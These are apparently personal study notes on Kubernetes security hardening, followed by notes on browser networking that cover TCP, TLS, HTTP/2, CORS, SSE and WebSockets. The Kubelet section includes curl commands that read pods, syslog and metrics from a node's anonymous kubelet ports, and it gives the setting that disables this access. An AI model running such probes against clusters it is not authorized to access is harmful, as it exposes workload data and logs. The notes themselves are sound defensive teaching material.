  2. Container: Prevent privilege escalation, use minimal base images.
  3. Cluster: Restrict API server access, encrypt etcd data.
  4. Cloud: Use cloud-native tools for monitoring and securing infrastructure.

Cluster Security

  • Harden the Kubernetes API server with role-based access control (RBAC).
  • Disable anonymous authentication for kubelet communication.

Pod Security

  • Use Pod Security Admission (PSA) to enforce best practices (e.g., no root users).
  • Isolate sensitive workloads using namespaces and network policies.

Code Security

  • Use static code analysis tools like SonarQube or Codacy.
  • Store secrets securely using Kubernetes Secrets.

Kubernetes Threat Models

Attack Vectors

  • Privilege Escalation: Exploiting weak RBAC configurations.
  • Unauthorized Access: Using misconfigured service accounts.
  • Data Theft: Exploiting unencrypted volumes or exposed secrets.

Mitigations

  • Apply principle of least privilege with RBAC.
  • Use encryption for both data at rest and in transit.
  • Regularly scan images for vulnerabilities.

Platform Security

Supply Chain Security

  • Use SBOMs (Software Bill of Materials) to track dependencies.
  • Sign container images using tools like Cosign.

Artifact and Image Security

  • Enforce vulnerability scanning with tools like Trivy or Clair.
  • Ensure images come from trusted registries.

Policy Enforcement

  • Use tools like Kyverno and OPA Gatekeeper to validate deployments.
  • Enforce policies for image signatures, namespace isolation, and resource quotas.

Compliance Frameworks

GDPR

  • Encrypt sensitive user data in transit and at rest.
  • Implement RBAC to restrict access to personal data.

HIPAA

  • Ensure secure handling of healthcare information using TLS and encrypted storage.
  • Log and monitor access to healthcare data.

PCI DSS

  • Segment payment data workloads with network policies.
  • Regularly audit access controls and encryption compliance.

CIS Benchmarks

  • Use kube-bench to check Kubernetes against CIS recommendations.
  • Ensure secure API server and etcd configurations.

Threat Modeling

STRIDE Framework

  • Spoofing: Prevent by enforcing strong authentication (e.g., mTLS).
  • Tampering: Ensure data integrity with digital signatures.
  • Information Disclosure: Encrypt all sensitive data.
  • Denial of Service: Use resource quotas and rate limits.

MITRE ATT&CK Framework

  • Focuses on real-world attack scenarios.
  • Categories include Initial Access, Persistence, Privilege Escalation, and Defense Evasion.

Observability and Incident Response

Monitoring and Logging

  • Use Prometheus for metrics collection and alerting.
  • Use Fluentd or Elasticsearch for log aggregation and search.

Incident Investigation Tools

  • Use Falco for runtime security alerts.
  • Use Zeek and Snort for network intrusion detection.

Kubernetes Cluster Component Security

  • Use TLS to ensure all traffic between cluster control-plane components is encrypted

Kube-API Server

  • Kube-API server is at the center of all operations in a Kubernetes cluster
  • In regards to security, we need to make 2 decisions, who can access the cluster, and what can they do?
    • Certificates
    • LDAP
    • Service Accounts
  • Once they gain access to the cluster, what they can do is defined by authorization mechanisms:
    • RBAC
    • ABAC

Controller Manager and Scheduler

  • Controller manager ensures nodes are healthy, manages pods and controllers, etc.
  • The scheduler determines where (on which nodes) the pods can run on in a cluster
  • To protect either of these components, you need to isolate them.

Kubelet

  • Kubelet runs on the worker nodes and manages the node
  • Kubelet registers the node with the control-plane
  • Kubelet listens on 2 ports:
    • 10250: Serves API that allows full access
    • 10255: Serves API that allows unauthenticated, read-only access
  • By default, kubelet allows anonymous access to its API.
    • curl -sk https://nodename:10250/pods/
    • curl -sk https://nodename:10250/logs/syslog/
    • curl -sk https://nodename:10255/metrics/
    • This can be disabled by setting anonymous-auth=false in the kubelet config
    • Kubelet supports 2 types of authentication, bearer token and certificate-based

Securing the Container Runtime

  • The container runtime is responsible for running the containers
  • CRI (Container Runtime Interface) allows Kubernetes to use any container runtime that is compliant with CRI
  • Common CRI-compliant container runtimes include containerd and CRI-O; Docker Engine's built-in dockershim integration was removed in Kubernetes 1.24
  • You should configure pods and containers to run with least privileges by configuring the security context
  • You should also scan the images for vulnerabilities before deploying them

Securing KubeProxy

  • KubeProxy is responsible for managing the network in a Kubernetes cluster
  • Ensure that proper permissions are set on the kube-proxy config file
    > ps aux | grep -i kube-proxy | grep -i config - This will show the kube-proxy process and the config file it is using
    > ls -l /var/lib/kube-proxy/kube-config.conf - This will show the permissions on the kube-proxy config file
    

Pod Security

Pod Security Admission

  • Pod Security Policies (PSP) were deprecated in Kubernetes 1.21 and removed in 1.25
  • Pod Security Admission (PSA) is the new way to enforce security policies on pods
  • PSA is a webhook that intercepts pod creation requests and validates them against a set of policies

Securing etcd

  • etcd is a distributed key-value store that stores the state of the cluster
  • etcd is a critical component of the cluster and should be secured
  • etcd should be configured to use TLS for encryption in transit. To encrypt the data stored in etcd, you create an EncryptionConfiguration and pass it to the kube-apiserver via --encryption-provider-config

Kubernetes Security Fundamentals

Pod Security Admission

  • Replaces Pod Security Policies and enforces the Pod Security Standards
  • Meant to be safe and easy to use.
  • Enabled by default. Runs as an admission controller.
  • Applied to namespaces. To apply to a namespace, simply add a label:
    kubectl label ns <namespace> pod-security.kubernetes.io/<mode>=<security standard>
    
    • Modes:

      • What action to take if a pod violates the policy
      • The modes are: enforce, audit, warn
    • Standards:

      • These are built-in policies
      • They are: Privileged, baseline, and restricted

Authentication

  • Kubernetes does not manage user accounts itself. It depends on an external service to do that.
  • All authentication is managed by the kube-api server
  • Kube-api server authenticates users via certificates, tokens, or an external service such as LDAP or Kerberos

Authorization

  • Once someone or something is authenticated, what are they able to do? This is authorization.
  • There are 6 different authorization modes in Kubernetes:
    • Node
    • ABAC
    • RBAC
    • Webhook
    • AlwaysAllow (the default)
    • AlwaysDeny
  • Authorization mode can be configured on the kube-api server using the --authorization-mode flag

RBAC

  • Role, ClusterRole, RoleBinding, ClusterRoleBinding

Secrets

  • Secrets are used to store sensitive information
  • They are similar in concept to ConfigMaps
  • Secrets are not encrypted by default, they are only base64 encoded
  • Secrets are only loaded on nodes where they are needed.

Namespaces

  • Namespaces can be used to isolate or organize resources in a Kubernetes cluster
  • RBAC can be applied to namespaces for authorization

Resource Quotas and Limits

Resource Requests and Limits

Resource Quotas

  • Sets hard limits on the total resource requests and limits (and object counts) that can be consumed within a namespace

Limit Ranges

Security Context

  • a Security Context gives you the ability to do several things:
    • run the container as a different UID/GID
    • make the root file system read-only
    • etc
  • Some settings can be applied on the pod, and some can be applied on the container
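  • A small example showing pod-level and container-level settings (names and IDs are arbitrary):

    apiVersion: v1
    kind: Pod
    metadata:
      name: security-context-demo
    spec:
      securityContext:              # applies to all containers in the pod
        runAsUser: 1000
        runAsGroup: 3000
        fsGroup: 2000
      containers:
      - name: demo
        image: busybox
        command: ["sh", "-c", "sleep 3600"]
        securityContext:            # container-level settings override pod-level
          readOnlyRootFilesystem: true
          allowPrivilegeEscalation: false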

Kubernetes Threat Model

  • Threat modeling helps you identify potential threats, understand their impact, and put measures in place to prevent them
  • Understand how traffic/data flows in the environment and identify vulnerabilities at each point

Persistence

  • Once an attacker accesses the environment, the first goal is typically to establish persistence.
  • Persistence allows attackers to maintain access to a cluster

Denial of Service

  • Set resource quotas to prevent excessive resource usage
  • Restrict service account permissions
  • Use Network Policies and firewalls to control access
  • Monitor and alert on unusual activity

Platform Security

Observability

  • Falco is a tool that can be used to monitor actions taken on cluster nodes, such as reading/writing files, etc.

Service Mesh

  • A service mesh is a dedicated infrastructure layer for handling service-to-service communication
  • It can handle service discovery, load balancing, encryption, etc.
  • Istio is a popular service mesh

Istio

  • Istio is a service mesh that provides a way to control how microservices share data with each other
  • Istio works with Kubernetes and traditional workloads
  • Istio uses a high-performance proxy service called Envoy to manage traffic between services

Certificates

Openssl

  • You can use openssl to generate certificates for the cluster
  • Generate keys: openssl genrsa -out my.key 2048
  • Create a CSR: openssl req -new -key my.key -subj "/CN=KUBERNETES-CA" -out ca.csr
  • Sign certificates: openssl x509 -req -in ca.csr -signkey my.key -out ca.crt

Compliance and Security Frameworks

Compliance Frameworks

  • Examples: GDPR, HIPAA, NIST, PCI DSS, CIS

GDPR

  • Introduced by the European Union to protect the data of citizens

HIPAA

  • A United States regulation used to control the access to health data

PCI DSS

  • Used to protect payment data

NIST

  • Created by the United States but recognized globally.
  • Used to protect compute environments by doing regular security-related audits (pentests, etc.)

CIS

  • CIS creates benchmarks for various environments such as operating systems and Kubernetes

Threat-Modeling Frameworks

  • Threat-modeling frameworks define how to achieve the compliance frameworks mentioned above
  • Two threat models of interest are STRIDE and MITRE

STRIDE

  • Created and maintained by Microsoft
  • Helps identify 6 categories of threats
    • Spoofing
    • Tampering
    • Repudiation
    • Information Disclosure
    • Denial of Service
    • Elevation of Privilege

MITRE

  • 5 categories
    • Initial Access
    • Execution
    • Persistence
    • Privilege Escalation
    • Defense Evasion
  • https://microsoft.github.io/Threat-Matrix-for-Kubernetes/

Supply Chain Compliance

  • Verify all the components (libraries, container images, etc.) that make up your application are secure and meet compliance requirements
  • Securing the supply chain focuses on 4 main areas:
    • artifacts
    • metadata
    • attestations
    • policies

Reduce docker image size

  • Smaller images are faster to download and deploy

  • Smaller images are more secure because they contain fewer packages and thus a smaller attack surface

  • Smaller images are easier to manage

  • To reduce the size of a docker image:

    • Use a smaller base image
    • Use specific package/image versions
    • Make file-system read-only
    • Don’t run the container as root
    • Use multi-stage builds
    • Remove unnecessary files
    • Use a .dockerignore file to exclude files and directories from the image
    • Use COPY instead of ADD
    • Use alpine images
    • Use scratch images
    • Use distroless images
  • Example of a multi-stage build:

      # build container stage 1
      FROM ubuntu
      ARG DEBIAN_FRONTEND=noninteractive
      RUN apt-get update && apt-get install -y golang-go
      COPY app.go .
      RUN CGO_ENABLED=0 go build app.go

      # app container stage 2
      # it is better to use a defined tag, rather than 'latest'
      FROM alpine:3.12.1
      RUN addgroup -S appgroup && adduser -S appuser -G appgroup -h /home/appuser
      COPY --from=0 /app /home/appuser/app
      # run as a non-root user
      USER appuser
      CMD ["/home/appuser/app"]
    
  • Dockerfile best practices: https://docs.docker.com/build/building/best-practices/

  • Only certain docker directives create new layers in an image

    • FROM
    • COPY
    • CMD
    • RUN
  • dive and docker-slim are two tools you can use to explore the individual layers that make up an image

Static Analysis

SBOM

  • A SBOM is a list of all the software that makes up a container image (or an application, etc.)
  • Formats
    • SPDX
      • The standard format for sharing SBOM
      • Available in JSON, RDF, and tag/value formats
      • More complex than CycloneDX due to its extensive metadata coverage
      • Comprehensive metadata including license information, origin, and file details
    • CycloneDX
      • A lightweight format focused on security and compliance
      • Available in JSON and XML formats
      • Simpler and more focused on essential SBOM elements
      • Focuses on component details, vulnerabilities, and dependencies

Kubesec

  • Used for static analysis of manifests
  • https://github.com/controlplaneio/kubesec

Syft

  • Syft is a powerful and easy-to-use open-source tool for generating Software Bill of Materials (SBOMs) for container images and filesystems. It provides detailed visibility into the packages and dependencies in your software, helping you manage vulnerabilities, license compliance, and software supply chain security.
  • Syft can export results in SPDX, CycloneDX, JSON, etc.
  • To scan an image with syft and export the results to a file in SPDX format:
    syft scan docker.io/kodekloud/webapp-color:latest -o spdx --file /root/webapp-spdx.sbom
    

Grype

  • Grype is a tool (also from Anchore) that can be used to scan SBOM for vulnerabilities
  • To scan a SBOM with Grype:
    grype /root/webapp-sbom.json -o json --file /root/grype-report.json
    

Kube-linter

  • Kube-linter can be used to lint Kubernetes manifests and ensure best practices are being followed
  • kube-linter is configurable. You can disable/enable checks and even create your own custom checks
  • kube-linter includes recommendations for how to fix failed checks
  • https://github.com/stackrox/kube-linter

Scanning Images for Vulnerabilities

trivy

  • trivy can be used to scan images for vulnerabilities
  • https://github.com/aquasecurity/trivy
  • Example:
      sudo docker run --rm  aquasec/trivy:0.17.2 nginx:1.16-alpine
    

Networking

Directory Map

Browser Networking

Directory Map

Chapter 1

  • There are two critical components that dictate the performance of all network traffic
    • latency - The time it takes from the source to send a packet to the destination receiving it
      • Components of a typical router on the internet that contribute to latency
        • Propagation delay - Amount of time required for a message to travel from source to destination, which is a function of distance divided by the speed at which the signal propagates.
        • Transmission delay - Amount of time required to push all the packet’s bits onto the link, which is a function of the packet’s length and the bandwidth of the link.
        • Processing delay - Amount of time required to process the packet header, check for bit-level errors, and determine the packet’s destination.
        • Queuing delay - Amount of time the incoming packet is waiting in the queue until it can be processed.
        • The total latency between client and server is the sum of all delays just listed
    • bandwidth - The maximum throughput of a logical or physical communication path

Chapter 2

The TCP 3-way Handshake process:

  1. SYN - Client picks a random sequence number x and sends a SYN packet, which may also include additional TCP flags and options
  2. SYN/ACK - Server increments x by 1, picks own random sequence number y, appends its own flags and options, and dispatches the response
  3. ACK - Client increments both x and y by one and completes the handshake by dispatching the last ACK packet in the handshake

Flow control

  • Flow control is a method for preventing the sender from overloading the receiver with data they may not be able to process
  • Each side of the TCP connection advertises its own receive window (rwnd), which communicates the size of the available buffer space to hold the data
  • The window size can be changed during a connection. If the window size drops to 0, the receiver cannot accept any more data until it finishes processing the data already buffered
  • Each ACK packet carries the latest rwnd on each side of the connection

TCP Slow Start

TCP slow start is a congestion control mechanism used in TCP (Transmission Control Protocol), which is one of the core protocols of the Internet. The purpose of TCP slow start is to gradually increase the amount of data sent by a sender until it reaches an optimal level that maximizes network utilization without causing congestion. When a TCP connection is established between a client and a server, the sender begins by sending a small number of data packets. During the initial phase, the sender’s transmission rate is low to avoid overwhelming the network or causing congestion. This phase is known as slow start.

Here’s how TCP slow start works:

  1. Connection Establishment: The TCP connection is established between the sender and the receiver.
  2. Initial Congestion Window (cwnd): At the beginning of the connection, the sender sets its congestion window (cwnd) to a small value, usually one or two segments worth of data. The congestion window represents the number of unacknowledged packets that the sender can have in flight at any given time.
  3. Sending Data: The sender starts sending data to the receiver, and it waits for acknowledgments (ACKs) from the receiver for each packet sent.
  4. Doubling cwnd: For each ACK received, the sender increases its congestion window size by doubling it. This means that with every successful round-trip of ACKs, the sender is allowed to send twice as many packets as before.
  5. Exponential Growth: As the sender continues to receive ACKs, the congestion window keeps doubling, leading to an exponential growth in the sender’s data transmission rate.
  6. Congestion Avoidance: Once the congestion window reaches a certain threshold (known as the slow-start threshold), the congestion control mechanism switches from slow start to congestion avoidance. During congestion avoidance, the sender increases the congestion window linearly instead of exponentially.
  7. Multiplicative Decrease: In case of packet loss, which indicates network congestion, the sender interprets it as a sign of congestion and reduces its congestion window size significantly, implementing a multiplicative decrease.

The purpose of TCP slow start is to allow the sender to probe the available bandwidth and avoid overwhelming the network with a sudden surge of data. It provides a conservative approach to ensure network stability while still enabling the sender to ramp up its transmission speed to make efficient use of available resources. Slow start is essential for achieving fairness and stability in TCP-based communication across the Internet.
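
To make the growth pattern concrete, here is a minimal Go sketch that simulates how the congestion window grows per round trip: exponentially under slow start, then linearly under congestion avoidance. The initial window, ssthresh value, and round count are arbitrary values chosen for illustration.

package main

import "fmt"

func main() {
	const (
		initialCwnd = 10 // initial congestion window, in segments (per the IW10 recommendation)
		ssthresh    = 64 // made-up slow-start threshold, in segments
		rounds      = 10
	)

	cwnd := initialCwnd
	for rtt := 1; rtt <= rounds; rtt++ {
		fmt.Printf("RTT %2d: cwnd = %d segments\n", rtt, cwnd)
		if cwnd < ssthresh {
			// Slow start: the window roughly doubles every round trip, capped at ssthresh.
			cwnd *= 2
			if cwnd > ssthresh {
				cwnd = ssthresh
			}
		} else {
			// Congestion avoidance: linear growth, about one segment per round trip.
			cwnd++
		}
	}
}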

Congestion Avoidance

It is important to recognize that TCP is designed to use packet loss as a feedback mechanism to help regulate its performance. Slow start initializes the connection with a conservative congestion window and, for every round trip, doubles the amount of data in flight until it exceeds the receiver’s flow-control window or a system-configured congestion threshold (ssthresh), or until a packet is lost, at which point the congestion avoidance algorithm takes over.

Optimizing TCP

Some general guidelines for optimizing TCP on a system:

  • Ensure the system is running the latest kernel
  • Increase TCP’s Initial Congestion Window to 10
  • Disable slow-start after idle to improve performance for long-lived TCP connections, which transfer data in bursts
  • Enable Window Scaling to increase the maximum receive window size and allow high-latency connections to achieve better throughput
  • Enable TCP Fast Open to allow data to be sent in the initial SYN packet in certain situations.
  • Eliminate redundant data transfers. You cannot make the bits travel faster. However, you can reduce the number of bits that are sent
  • Compress transferred data
  • Position servers closer to the user to reduce RTT
  • Reuse established TCP connections whenever possible

Inspecting open socket statistics on Linux systems

Run sudo ss --options --extended --memory --processes --info to see current peers and their respective connection settings

Chapter 3

UDP

  • UDP packets are very simple. They add only four header fields to the payload: checksum, length, source port, and destination port. Of these, only length and destination port are required.

NAT

Because UDP does not maintain connection state, NAT devices do not know when a connection is no longer active, so NAT translators expire UDP connections based on a timer. The timeout value typically varies across manufacturers of NAT devices.

NAT Traversal

NAT can cause issues for client applications that need to be aware of the public IP of the connection. Some example applications are P2P apps such as VoIP, games, and file sharing. To work around this issue, protocols such as STUN, TURN, and ICE were created.

  • STUN - Session Traversal Utilities for NAT. A protocol that allows the host application to discover the presence of a NAT device on the network and, when present, obtain the allocated public IP address and port tuple for the current connection. To do this, the application requires assistance from a well-known, third-party STUN server that resides on the network. The IP address of the STUN server can be discovered via DNS.
  • TURN - Traversal Using Relays around NAT. Runs over UDP, but can switch to TCP when it fails. Requires a well-known public relay to shuttle the data between peers.

Chapter 4

SSL/TLS

  • TLS was designed to operate on top of a reliable transport protocol such as TCP. However, it has also been adapted to run over UDP.
  • The TLS protocol was designed to provide three services: authentication, encryption, and data integrity. However, you are not required to use all three in every situation.
  • In order to establish a cryptographically secure data transfer channel, the peers must agree on a cipher suite and the keys used to encrypt the data. The TLS protocol defines a well-known handshake to perform this exchange, known as the TLS handshake.
  • TLS uses asymmetric (public key) cryptography.
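
As a quick illustration of the client side of this exchange, the following Go sketch dials a TLS connection and prints what the handshake negotiated; the host example.com:443 is just a placeholder endpoint.

package main

import (
	"crypto/tls"
	"fmt"
)

func main() {
	// Dial performs the TCP connect followed by the TLS handshake.
	conn, err := tls.Dial("tcp", "example.com:443", &tls.Config{})
	if err != nil {
		fmt.Println("handshake failed:", err)
		return
	}
	defer conn.Close()

	// Inspect what the handshake negotiated: protocol version, cipher suite,
	// and the certificate chain used to authenticate the server.
	state := conn.ConnectionState()
	fmt.Printf("TLS version: %#x\n", state.Version)
	fmt.Println("cipher suite:", tls.CipherSuiteName(state.CipherSuite))
	fmt.Println("server certificates:", len(state.PeerCertificates))
}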

Chapter 9

Chapter 10

  • The execution of a web app involves three tasks
    1. Fetch resources
    2. page layout and rendering
    3. Javascript execution

Rendering and script execution are performed on a single thread; it is not possible to run them concurrently.

The Navigation Timing API is included in most modern web browsers. It can be used for a holistic view of page load timing. It includes DNS and TCP connect times with high precision. The Resource Timing API is also included with most modern browsers and can be used to view the performance profile of a page. The User Timing API provides a simple JavaScript API to mark and measure application-specific performance metrics with the help of high-resolution timers.

Chapter 11

HTTP Pipelining

HTTP Pipelining is a technique in the HTTP protocol that allows the client to send multiple requests without waiting for the corresponding responses. The server must return the responses in the same order the requests were received, and the client processes them as they arrive. HTTP pipelining adoption has remained very limited despite its many benefits. This is because of several drawbacks:

  1. A single slow response blocks all requests behind it
  2. When processing requests in parallel, servers must buffer all responses behind the current response. This could lead to resource exhaustion on the server as buffers grow larger and larger.
  3. A failed response may terminate the TCP connection, causing the client to retransmit the request. This could lead to duplicate request processing on the server.
  4. Intermediary devices in the network hop path can cause issues, and compatibility with Intermediary devices is hard to detect. One way around this is to use a secure tunnel, which prevents intermediary devices from reading/modifying the connection.

Head of Line Blocking

Head of Line blocking can be caused by HTTP pipelining. With HTTP Pipelining, the server processes requests in the order they are received. If a particular request takes a long time to process, the responses for other requests will be blocked.

Headers

  • Headers remain unmodified and are always sent as plain text to remain compatible with previous versions of HTTP. Headers were introduced in HTTP 1.0. Headers typically add 500-800 bytes to the total payload. However, cookies can make them dramatically larger. RFC 2616 does not define a limit on the size of HTTP headers. However, many servers and proxies will try to enforce either an 8 KB or 16 KB limit.
  • The growing list of headers is not bad in and of itself. However, the fact that all HTTP headers are transferred in plain text (without compression) can lead to high overhead costs for each and every request.
  • In the example below, we can see that our headers make up 157 bytes of the payload, while the content itself only takes up 15 bytes.
$ curl --trace-ascii - -d'{"msg":"hello"}' http://www.igvita.com/api

== Info:   Trying 173.230.151.99:80...
== Info: Connected to www.igvita.com (173.230.151.99) port 80 (#0)
=> Send header, 157 bytes (0x9d)
0000: POST /api HTTP/1.1
0014: Host: www.igvita.com
002a: User-Agent: Mozilla/5.0 Gecko
0049: Accept: */*
0056: Content-Length: 15
006a: Content-Type: application/x-www-form-urlencoded
009b: 
=> Send data, 15 bytes (0xf)
0000: {"msg":"hello"}

Concatenation and Spriting

  • Concatenation is the ability for HTTP 1.x to bundle multiple JavaScript or CSS files into a single resource
  • Spriting is the ability for multiple images to be combined into a larger, composite image and sent via a single response.

Chapter 12

  • HTTP 2.0 introduced a new form of encapsulation which provides more efficient use of network resources and reduced perception of latency by allowing header field compression and multiple concurrent messages on the same connection.

Binary Framing Layer

At the core of the HTTP 2.0 enhancements is the HTTP binary framing layer, which dictates how HTTP messages are encapsulated and transmitted between client and server. The “layer” refers to a design choice to introduce a new mechanism between the socket interface and the higher HTTP API exposed to the application. HTTP 1.x messages are newline-delimited plain text, while all HTTP 2.0 communication is split into smaller messages and frames, each of which is encoded in binary format.

Streams, Messages, and Frames

HTTP 2.0 introduced some new terminology. Let’s go over that now.

  • Stream = a bidirectional flow of bytes within an established HTTP 2.0 connection. All communication is performed within a single TCP connection. Each stream has a unique integer identifier.
  • Message = a complete sequence of frames that map to a logical message. The message is a logical HTTP message, such as a request or response.
  • Frame = The smallest unit of HTTP communication, each containing a frame header, which at a minimum identifies to which stream the frame belongs. Frames carry specific types of data, such as headers, payloads, etc.
TCP Connection
------------------------------------------------------------------------------------------------------------------------------------------
Stream 1:
==============================================================              ==============================================================
Message: Frame[<Header>] Frame[<Payload>]                                   Message: Frame[<Header>] Frame[<Payload>]
==============================================================              ==============================================================

Stream 2:
==============================================================              ==============================================================
Message: Frame[<Header>] Frame[<Payload>]                                   Message: Frame[<Header>] Frame[<Payload>]                                   
==============================================================              ==============================================================
------------------------------------------------------------------------------------------------------------------------------------------

This model provides request and response multiplexing, in which the client can be transmitting frames to the server, and at the same time the server can be transmitting frames to the client. All within a single TCP connection. This essentially eliminates the head-of-line blocking problem!

Server Push

HTTP 2.0 also introduces Server Push. With server push, a client may send a single request for a resource, and the server can then send multiple responses back for resources that it knows the client will need. Why would we ever need this? A web page/app consists of multiple resources, all of which are discovered by the client while examining the document provided by the server. If the server knows the client is going to need those additional resources, it can just send them without the client actually requesting them. What if the client doesn’t want these additional resources? The client has the option to deny the resource being sent by the server. This process is implemented via a “Push Promise”. All server pushes are initiated with a Push Promise, which signals the server’s intent to push resources to the client. The Push Promise frame only contains the HTTP headers of the promised resource. Once the client receives the promise, it has the option to decline the stream if it wants to (e.g. if the resource is already in the local client cache).

Apache’s mod_spdy module looks for an X-ASSOCIATED-CONTENT header, which lists the resources to be pushed. The server can also just parse the document and infer the resources to be pushed. The strategy for implementing server push is not defined in the RFC and is left up to the developer.

Header compression

Each HTTP 1.x transfer carries headers with it that can consume anywhere from 300-800 bytes of overhead per request, and kilobytes more if cookies are required. To reduce this overhead, HTTP 2.0 introduced header compression.

  • Instead of transmitting the same data on each request and response, HTTP 2.0 uses “header tables” on both the client and server to keep track of previously sent key-value pairs
  • Header tables persist for the lifetime of the HTTP 2.0 connection and can be incrementally updated
  • Key-value pairs can be added or replaced

The key-value pairs for some headers like “method” and “scheme” rarely change during a connection, so a second request within the connection will not need to send these headers, saving several hundred bytes of data.

Chapter 13

The physical properties of the communication channel set hard performance limits on every application. Speed of light and distance between client and server dictate the propagation latency, and the choice of medium (wired vs. wireless) determines the processing, transmission, queueing, and other delays incurred by each data packet. In fact, the performance of most web apps is limited by latency, not by bandwidth. While bandwidth speeds continue to increase, the same cannot be said for latency. As a result, while we cannot make the bits travel any faster, it is crucial that we apply all the possible optimizations at the transport and application layers to eliminate unnecessary round trips, requests, and minimize the distance traveled by each packet.

  • Latency is the bottleneck, and the fastest bits are bits not sent.

Caching resources on the client

  • The cache-control header can specify the cache lifetime of a resource
  • The last-modified and ETag headers provide validation mechanisms for cached resources
  • You should specify both the cache-control header and a validator (last-modified or ETag); one is not a substitute for the other.

Optimizing for HTTP 2.0

At a minimum:

  1. Server should start with a TCP CWND of 10 segments
  2. Server should support TLS with ALPN negotiation
  3. Server should support TLS connection reuse to minimize handshake latency

Chapter 15

XHR

XHR is a browser-level API that allows the client to script data transfers via JavaScript. XHR made its debut in IE5 and was created by the original team that built the Outlook Web App. It was one of the key technologies behind the Asynchronous JavaScript and XML (AJAX) revolution. Prior to XHR, the webpage had to be refreshed to send any state updates between client and server. With XHR, this workflow could be done asynchronously and under full control of the application in JavaScript code. XHR is what enabled us to make the leap from building basic web pages to building full web applications.

CORS (Cross Origin Resource Sharing)

XHR is a browser-level API that automatically handles myriad low-level details such as caching, handling redirects, content negotiation, authentication, and much more. This serves a dual purpose. First it makes the application APIs much easier to work with, allowing us to focus on the business logic. But, second, it allows the browser to sandbox and enforce a set of security and policy constraints on the application code.

The XHR interface enforces strict HTTP semantics on each request. While the XHR API allows the application to add custom HTTP headers (via the setRequestHeader() method), there are a number of protected headers that are off-limits to application code:

  • Accept-Charset, Accept-Encoding, Access-Control-*
  • Host, Upgrade, Connection, Referer, Origin
  • Cookie, Sec-, Proxy-, and lots more

The browser will refuse to override any of the unsafe headers. Protecting the Origin header is the key piece of the ‘same-origin policy’ applied to all XHR requests.

  • An origin is defined as a triple of application protocol, domain name, and port number (example: https, google.com, 443)

The motivation for CORS is simple: the browser stores sensitive information, such as auth tokens, cookies, and other private metadata, which must not be leaked across applications.

The browser automatically appends the protected Origin HTTP header, which advertises the origin from where the request is being made. In turn, the remote server is then able to examine the Origin header and decide if it should allow the request by returning an Access-Control-Allow-Origin header in its response.

  • By default, CORS requests omit user credentials such as cookies and auth tokens
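
To sketch the server side of this exchange in Go (the allow-list, port, and handler below are invented for the example), a handler can compare the incoming Origin header against an allow-list and echo it back in Access-Control-Allow-Origin:

package main

import "net/http"

// allowedOrigins is a hypothetical allow-list for this example.
var allowedOrigins = map[string]bool{
	"https://app.example.com": true,
}

// withCORS inspects the Origin header set by the browser and, if the origin
// is allowed, echoes it back in Access-Control-Allow-Origin.
func withCORS(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if origin := r.Header.Get("Origin"); allowedOrigins[origin] {
			w.Header().Set("Access-Control-Allow-Origin", origin)
		}
		// Answer CORS preflight (OPTIONS) requests without invoking the real handler.
		if r.Method == http.MethodOptions {
			w.Header().Set("Access-Control-Allow-Methods", "GET, POST")
			w.WriteHeader(http.StatusNoContent)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	api := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte(`{"msg":"hello"}`))
	})
	http.ListenAndServe(":8080", withCORS(api))
}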

Polling with XHR

XHR enables a simple and efficient way to sync client updates with the server. Whenever necessary, an XHR request is dispatched by the client to update the appropriate data on the server. However, the same problem, in reverse, is much more difficult. If data is updated on the server, how does the server notify the client? The answer is that the client must poll the server.

Chapter 16

Server Sent Events (SSE)

Server-Sent Events (SSE) is a technology that enables a server to send continuous updates or event streams to clients over HTTP. It is a unidirectional communication method where the server pushes data to the client, allowing real-time updates without the need for the client to repeatedly request information. To meet this goal, SSE introduced two components: a new EventSource interface in the browser, which allows the client to receive push notifications from the server as DOM events, and the “event stream” data format, which is used to deliver the individual updates.

Here’s how Server-Sent Events work:

  1. Establishing a Connection: The client initiates a regular HTTP connection with the server by sending a GET request to a specific URL that handles SSE.
  2. Server Response: Upon receiving the GET request, the server responds with an HTTP header containing the “Content-Type” field set to “text/event-stream”. This indicates that the server will be sending events rather than a traditional HTTP response.
  3. Event Stream Format: The server sends events in a specific format. Each event is represented as a separate message and consists of one or more lines. Each line can either be an event field or data field. An event field starts with “event:” followed by the event name, while a data field starts with “data:” followed by the event data.
  4. Connection Persistence: Unlike traditional HTTP requests, SSE connections persist and remain open until either the server or the client explicitly closes them. This enables the server to send events to the client whenever updates occur.
  5. Event Lifecycle: The server can send events at any time, and the client receives them immediately. The client-side JavaScript code can listen for these events and perform actions or update the user interface based on the received data.
  6. Error Handling: SSE connections can handle errors gracefully. If the connection is lost, the client automatically attempts to reconnect, allowing a reliable and uninterrupted stream of events.
  7. Closing the Connection: The client or server can close the connection at any time. If the client wants to terminate the SSE connection, it can simply close the connection from its end, and the server will recognize that the client is no longer available.

Server-Sent Events are often used for real-time notifications, live feeds, chat applications, or any scenario where continuous updates from the server to clients are required. It provides a lightweight and easy-to-use alternative to WebSockets when bidirectional communication is not necessary.

Event Stream Protocol

An SSE event stream is delivered as a streaming HTTP response:

  1. The client sends a regular HTTP GET request
  2. The server responds with a custom “text/event-stream” content-type header, and then streams the UTF-8 encoded data.
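
A minimal Go sketch of such a streaming endpoint is shown below; the /events path and the one-second tick are arbitrary choices for the example.

package main

import (
	"fmt"
	"net/http"
	"time"
)

func events(w http.ResponseWriter, r *http.Request) {
	// Advertise the event-stream content type and keep the response open.
	w.Header().Set("Content-Type", "text/event-stream")
	w.Header().Set("Cache-Control", "no-cache")

	flusher, ok := w.(http.Flusher)
	if !ok {
		http.Error(w, "streaming unsupported", http.StatusInternalServerError)
		return
	}

	for i := 0; ; i++ {
		select {
		case <-r.Context().Done():
			return // client closed the connection
		case <-time.After(time.Second):
			// Each update is one or more fields followed by a blank line.
			fmt.Fprintf(w, "event: tick\ndata: update %d\n\n", i)
			flusher.Flush()
		}
	}
}

func main() {
	http.HandleFunc("/events", events)
	http.ListenAndServe(":8080", nil)
}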

Chapter 17

Websocket

Websocket enables bidirectional, message-oriented streaming of text and binary data between client and server. It is the closest thing to a raw network socket in the browser that we have.

The WebSocket resource URL uses its own custom scheme: ws for plain-text communication and wss for encrypted (TLS) communication. Why the custom scheme, instead of http/s? The primary use case for the Websocket protocol is to provide an optimized, bidirectional communication channel between applications running in the browser and server. However, the WebSocket wire protocol can be used outside of the browser and could be negotiated via a non-http exchange.

